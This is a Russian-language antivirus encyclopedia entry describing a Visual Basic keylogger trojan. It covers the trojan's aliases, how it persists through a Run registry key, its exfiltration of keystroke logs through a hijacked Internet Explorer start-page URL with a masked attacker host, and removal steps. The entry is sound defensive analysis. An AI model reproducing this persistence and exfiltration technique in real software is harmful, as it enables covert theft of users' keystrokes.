Другие названия
Trojan-Spy.Win32.VB.m («Лаборатория Касперского») также известен как: TrojanSpy.Win32.VB.m («Лаборатория Касперского»), PWS-RedNeck (McAfee), PWSteal.Trojan (Symantec), BackDoor.Frestr (Doctor Web), TrojanSpy:Win32/VB.M (RAV), TROJ_VB.M (Trend Micro), TR/SPY.VB.m (H+BEDV), Win32:Trojan-gen. (ALWIL), Trojan.Spy.VB.M (SOFTWIN), Backdoor Program (Panda), Win32/Spy.VB.M (Eset).
Поведение
Trojan-Spy, программа-шпион.
Технические детали
Троянская программа — клавиатурный шпион. Является приложением Windows (PE EXE-файл). Имеет размер 36864 байта. Написана на Visual Basic.
Инсталляция
После запуска троянец копирует свое тело в корневой каталог Windows под именем «SYSEDIT.EXE»:
%WinDir%SYSEDIT.EXE
С целью автоматического запуска при каждом последующем старте системы троянец добавляет ссылку на свой исполняемый файл в ключ автозапуска системного реестра:
[HKLMSoftwareMicrosoftWindowsCurrentVersionRun]
"sysedit" = "%WinDir%SYSEDIT.EXE"
Деструктивная активность
Троянская программа отслеживает нажатия клавиш клавиатуры. Для сохранения и отправки похищаемых данных злоумышленнику используется ключ системного реестра, отвечающий за стартовую страницу браузера Internet Explorer:
[HKCUSoftwareMicrosoftInternet ExplorerMain]
"Start Page" = http://www.***sch.com/test/test.php?page=%current_start_page%&text=%log%
При загрузке браузера открывается сайт злоумышленника, затем происходит редирект на обычную стартовую страницу пользователя. При этом в качестве параметра «text» на сайт злоумышленника передается собранная информация о клавиатурном вводе. После успешной передачи данных лог обнуляется.
Рекомендации по удалению
Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для ее удаления необходимо выполнить следующие действия:
- При помощи «Диспетчера задач» завершить троянский процесс.
- Удалить оригинальный файл троянца (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
- Удалить файл, созданный троянцем:
%WinDir%SYSEDIT.EXE
- При помощи редактора системного реестра удалить следующие записи из реестра:
[HKCUSoftwareMicrosoftInternet ExplorerMain]
"Start Page" = http://www.***sch.com/test/test.php?page=%current_start_page%&text=%log%
[HKLMSoftwareMicrosoftWindowsCurrentVersionRun]
"sysedit" = "%WinDir%SYSEDIT.EXE"
- Восстановить желаемую стартовую страницу.
- Произвести полную проверку компьютера Антивирусом Касперского с обновленными антивирусными базами (скачать пробную версию).
Источник: viruslist.com.
|